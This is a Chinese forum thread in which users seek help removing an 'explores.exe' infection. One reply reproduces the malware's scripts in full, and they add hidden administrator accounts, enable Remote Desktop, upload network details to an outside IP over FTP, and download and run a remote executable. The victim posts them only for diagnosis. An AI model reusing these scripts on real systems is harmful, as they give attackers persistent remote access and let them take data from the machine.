Question

求explores.exe病毒的专杀工具?

Answer 1

我和楼主遭遇同样病毒，我的系统是2003server，用了所有大牌杀毒软件，均无法彻底查杀，并均不对explores.exe报毒。该病毒与前几年肆虐的iexplores.exe只有一字之差，但更为难杀！

痛苦的是，很多杀软、360急救箱不支持2003系统。

目前，仍未清除该病毒，但我不想重新分区、重装系统，故意留着做杀毒对抗练习。

 

该病毒症状：开机自动启动，无论你怎么杀！开机自动启动CMD下载，代码如下：

@echo off

@echo off>x

mode con: COLS=15 lines=10>x

@echo open 173.208.216.54>x

@echo 123>>x

@echo 123>>x

@echo get 123.exe c:\123.exe>>x

@echo bye>>X

@ftp -s:x

start C:\123.exe>>x

 

以上代码为一个360.bat文件，和另一个360.vbs文件，其代码如下：

set wshshell=createobject("wscript.shell")

a=wshshell.run ("cmd.exe /c net user  3800 my3800$ /add",0)

b=wshshell.run ("cmd.exe /c net localgroup administrators 3800 /add",0)

c=wshshell.run ("cmd.exe /c net user 3800 /active:yes",0)

 

以上代码会在你电脑中增加一个管理员账户，而且这个名字“3800”是会随机变化的，每重启一次就会变一次。因此是否感染此病毒，看看你的计算机用户有没有很多奇怪名字的管理员账户就知道了。

搞笑的是这两个该死的文件存储在360safe文件夹下，无论你如何删除，甚至用粉碎工具防止再生性粉碎掉，他们仍然会死灰复燃，不过可能换了名字，换了路径。

 

恶心的是，该病毒远远不止生成这两个这样文件而已，还有这些：

估计这都还只是一部分。

可悲的是，目前我还没确定它是何来历，没有查到专杀工具、病毒的大名、母本及其机理。

 

在此贴出上图中各文件的代码，以供路过的大侠给出答案：

tsp.bat的代码如下:

cmd /c "@ipconfig >>3389.txt

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f >>3389.txt

REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber >>3389.txt

net1 user 3800 my3800$ /add >>3389.txt

net1 localgroup administrators 3800 /add >>3389.txt

echo open 173.208.216.54> cmd.txt

echo 123>> cmd.txt

echo 123>> cmd.txt

echo binary >> cmd.txt

echo put 3389.txt %random%~%random%~%random%~%random%.txt>> cmd.txt

echo bye >> cmd.txt

ftp -s:cmd.txt

del 3389.txt

del cmd.txt

del %0

exit

 

 

nnd.bat的代码如下:

taskkill /f /im 360qa.exe /t

taskkill /f /im busy.exe /t

taskkill /f /im explores.exe /t

taskkill /f /im ppap.exe /t

taskkill /f /im win.exe /t

del c:\windows\ime\*.exe

ping 127.0.0.1 -n 80

start c:\windows\java\net.exe

 

 

nnda.bat的代码如下:

ping 127.0.0.1 -n 160

del c:\windows\system32\nop.tlb

start c:\windows\system32\wbem\explores.exe

 

 

nnds.bat的代码如下:

taskkill /f /im net.exe

ping 127.0.0.1 -n 160

start C:\Progra~1\3km2\busy.exe

 

 

run.vbs的代码如下：

WScript.Sleep 600000

CreateObject("WScript.Shell").Run "cmd /c C:\windows\system\run.bat",0

WScript.Sleep 60000

CreateObject("WScript.Shell").Run "cmd /c c:\windows\system32\wbem\osinters.exe",0

WScript.Sleep 60000

CreateObject("WScript.Shell").Run "cmd /c C:\Progra~1\3km2\busy.exe",0

WScript.Sleep 60000

CreateObject("WScript.Shell").Run "cmd /c c:\windows\system32\wbem\explores.exe",0

WScript.Sleep 60000

CreateObject("WScript.Shell").Run "cmd /c c:\windows\java\net2.exe",0

 

 

gouri.bat的代码如下：

ping 127.0.0.1

123.exe

ping 127.0.0.1

c:\123.exe

 

 

sb.bat的代码如下：

net user 3800 my3800$

net localgroup administrators 3800 /add

net user 3800 /active:yes

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"

 

 

se.bat的代码如下：

@echo off

if exist C:\downs\run.exe start C:\downs\run.exe

 

 

曾用过的杀软包括：瑞星、卡巴、金山、麦咖啡、360、木马清道夫、木马克星等，其中卡巴、麦咖啡无法更新病毒库。均无法彻底清除此病毒，且各杀软报告的病毒名迥异。以下是2012年9月所有杀毒软件对该病毒的扫描结果：http://r.virscan.org/a5c1b822be346671321ef45eed02f4c1

 

我能提供的信息就这些了，希望哪位解决了同样问题的，给我们分享办法，救我们脱离苦海。谢谢。

Answer 2

你可以使用下360急救箱，下载，解压后，进入安全模式运行360系统急救箱自定义全盘扫描，查杀一遍，查杀完成后重启电脑。 然后再打开360系统急救箱，选择修复功能（修复选项可全选），立即修复，如果还是不能解决问题，那就重装系统。

Answer 3

这病毒...貌似没有专杀。
能把报的病毒名字告诉我么？
不想这么麻烦的话直接安全模式下全盘扫描就行。实在不行就用dr.web cureit

Answer 4

你可以使用360系统急救箱来解决它。